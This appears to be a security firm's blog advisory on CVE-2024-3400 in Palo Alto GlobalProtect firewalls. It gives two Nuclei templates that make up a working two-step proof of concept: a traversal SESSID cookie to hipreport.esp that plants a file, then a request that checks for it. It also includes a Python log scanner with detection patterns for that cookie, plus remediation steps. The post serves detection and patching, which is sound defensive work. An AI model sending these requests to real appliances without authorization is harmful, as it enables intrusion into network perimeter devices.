Gal Nagli
CEO
Palo Alto publicly disclosed last week that various versions of their on-prem firewall appliance are vulnerable to CVE-2024-3400, which can lead to Remote Code Execution and carries a CVSS score of 10.0.
Detection and Exploitation
Shockwave was able to create detection templates using Nuclei's YAML rules and to successfully exploit the vulnerability by following public PoCs published on the internet, initially at this blog.
We have shared our detection template on our dedicated GitHub repository for Attack Surface CVE threats:
Proof of Concept
The PoC is divided into two parts. First, we create our arbitrary file on the server with the initial Nuclei template (or the HTTP request it contains); it creates a "shockwave.txt" file under the publicly accessible global-protect/portal/images path.
```yaml
id: CVE-2024-3400

info:
  name: GlobalProtect - OS Command Injection
  author: shockwave
  severity: critical
  reference:
    - https://labs.watchtowr.com/palo-alto-putting-the-protecc-in-globalprotect-CVE-2024-3400/
    - https://github.com/fkie-cad/nvd-json-data-feeds
    - https://github.com/k4nfr3/nmap-scripts
    - https://github.com/0x0d3ad/CVE-2024-3400
    - https://github.com/FoxyProxys/CVE-2024-3400
    - https://github.com/MrR0b0t19/CVE-2024-3400
    - https://nvd.nist.gov/vuln/detail/CVE-2024-3400
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10
    cve-id: CVE-2024-3400
    cwe-id: CWE-77
    epss-score: 0.00371
    epss-percentile: 0.72356
    cpe: cpe:2.3:o:paloaltonetworks:pan-os:10.2.0:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    fofa-query: icon_hash="-631559155"
    product: pan-os
    vendor: paloaltonetworks
  tags: cve,cve2024,globalprotect,pan-os,rce,oast,kev

http:
  - raw:
      - |
        POST /ssl-vpn/hipreport.esp HTTP/1.1
        Host: {{Hostname}}
        Cookie: SESSID=/../../../var/appweb/sslvpndocs/global-protect/portal/images/shockwave.txt;

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "http"

      - type: word
        part: body
        words:
          - "GlobalProtect Portal"
```
The second step is to query the created file: if we receive a 403 on that specific path, it confirms the file was created; otherwise, the appliance is patched.
```yaml
id: CVE-2024-3400

info:
  name: GlobalProtect - OS Command Injection
  author: pdresearch,parthmalhotra
  severity: critical
  reference:
    - https://labs.watchtowr.com/palo-alto-putting-the-protecc-in-globalprotect-CVE-2024-3400/
    - https://github.com/fkie-cad/nvd-json-data-feeds
    - https://github.com/k4nfr3/nmap-scripts
    - https://github.com/0x0d3ad/CVE-2024-3400
    - https://github.com/FoxyProxys/CVE-2024-3400
    - https://github.com/MrR0b0t19/CVE-2024-3400
    - https://nvd.nist.gov/vuln/detail/CVE-2024-3400
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10
    cve-id: CVE-2024-3400
    cwe-id: CWE-77
    epss-score: 0.00371
    epss-percentile: 0.72356
    cpe: cpe:2.3:o:paloaltonetworks:pan-os:10.2.0:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    fofa-query: icon_hash="-631559155"
    product: pan-os
    vendor: paloaltonetworks
  tags: cve,cve2024,globalprotect,pan-os,rce,oast,kev

http:
  - raw:
      - |
        GET /global-protect/portal/images/shockwave.txt HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 403
```
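A defender-side counterpart to the two-step check above, added here as an example and not part of the original post or of Shockwave's templates: it scans a constructed access-log sample for the SESSID traversal cookie sent to hipreport.esp and for the follow-up probe of a planted file under the images path, then correlates both stages per client. The simplified log format, the sample lines and the indicator names are assumptions.

```python
import re
from collections import defaultdict

# Constructed sample log lines (not captured from any real appliance). Assumed
# simplified format: client_ip method path "cookie-header-value".
SAMPLE_LOGS = [
    '203.0.113.5 POST /ssl-vpn/hipreport.esp "SESSID=/../../../var/appweb/sslvpndocs/global-protect/portal/images/shockwave.txt;"',
    '203.0.113.5 GET /global-protect/portal/images/shockwave.txt "-"',
    '198.51.100.7 POST /ssl-vpn/hipreport.esp "SESSID=2b7d0c5e9a1f;"',
    '198.51.100.7 GET /global-protect/portal/images/logo.png "-"',
]

LOG_RE = re.compile(r'^(\S+) (\S+) (\S+) "([^"]*)"$')
# Stage 1 indicator: a session cookie value carrying a directory-traversal sequence.
TRAVERSAL_RE = re.compile(r'SESSID=[^;]*(?:\.\./|/\.\.)')
# Stage 2 indicator: a request for a text file under the publicly served images path.
PROBE_RE = re.compile(r'^/global-protect/portal/images/[^/]+\.txt$')


def parse_line(line):
    """Return (ip, method, path, cookie) or None for lines that do not parse."""
    m = LOG_RE.match(line)
    return m.groups() if m else None


def classify(ip, method, path, cookie):
    """Return the list of indicator names triggered by a single request."""
    hits = []
    if method == "POST" and path == "/ssl-vpn/hipreport.esp" and TRAVERSAL_RE.search(cookie):
        hits.append("sessid_traversal")
    if method == "GET" and PROBE_RE.match(path):
        hits.append("planted_file_probe")
    return hits


def scan(lines):
    """Map each client IP to the set of indicators it triggered across the log."""
    seen = defaultdict(set)
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue  # unparseable line: skip rather than crash the scan
        ip, method, path, cookie = parsed
        seen[ip].update(classify(ip, method, path, cookie))
    return seen


def suspicious_clients(lines):
    """Clients that both injected a traversal cookie and then probed for the file."""
    return sorted(ip for ip, hits in scan(lines).items()
                  if {"sessid_traversal", "planted_file_probe"} <= hits)


if __name__ == "__main__":
    for ip, hits in scan(SAMPLE_LOGS).items():
        print(ip, sorted(hits))
    print("two-stage pattern:", suspicious_clients(SAMPLE_LOGS))
```

Both stages are needed before a client is reported, so a single odd cookie or a stray request for a missing image does not page anyone; either indicator alone is still worth a lower-severity alert.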
It will look like the following (screenshots of a vulnerable instance and a fixed instance):
Remediation
Update your Palo Alto firewalls to the latest version using the patches suggested at https://security.paloaltonetworks.com/CVE-2024-3400
References
- https://labs.watchtowr.com/palo-alto-putting-the-protecc-in-globalprotect-CVE-2024-3400/
- https://github.com/fkie-cad/nvd-json-data-feeds
- https://github.com/k4nfr3/nmap-scripts
- https://github.com/0x0d3ad/CVE-2024-3400
- https://github.com/FoxyProxys/CVE-2024-3400
- https://github.com/MrR0b0t19/CVE-2024-3400
- https://nvd.nist.gov/vuln/detail/CVE-2024-3400
Closing Words
As always, our customers are the first to know about emerging threats. As proof of that, we were also able to be the first to report to various Bug Bounty Programs and help more entities protect their Attack Surface; we alerted about this particular threat 1 week before a public PoC was available.
https://www.linkedin.com/feed/update/urn:li:activity:7184496382420910080/